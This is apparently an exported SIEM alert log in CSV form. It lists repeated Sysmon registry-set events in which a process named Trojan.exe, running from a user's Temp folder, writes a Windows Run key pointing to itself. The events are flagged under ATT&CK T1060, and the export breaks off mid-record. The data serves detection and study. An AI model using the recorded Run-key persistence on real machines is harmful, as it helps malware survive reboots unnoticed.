..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:16.873553900Z"",""eventRecordID"":""1895"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:16.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:16.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:19.236",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:15.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:15.847683600Z"",""eventRecordID"":""1893"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:15.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:15.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:18.205",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:14.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:14.830985800Z"",""eventRecordID"":""1891"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:14.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:14.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:17.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:13.808 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:13.810865100Z"",""eventRecordID"":""1890"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:13.808\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:13.808"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:16.240",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:12.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:12.794774700Z"",""eventRecordID"":""1889"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:12.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:12.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:15.158",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:11.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:11.764048600Z"",""eventRecordID"":""1888"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:11.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:11.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:14.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:10.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:10.734517100Z"",""eventRecordID"":""1887"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:10.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:10.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:14.173",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:09.715 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:09.717115100Z"",""eventRecordID"":""1886"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:09.715\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:09.715"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:14.096",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:08.683 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:08.685402300Z"",""eventRecordID"":""1885"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:08.683\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:08.683"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:11.052",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:07.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:07.653852200Z"",""eventRecordID"":""1884"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:07.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:07.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:10.017",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:06.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:06.622251900Z"",""eventRecordID"":""1883"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:06.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:06.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:09.002",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:05.606 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 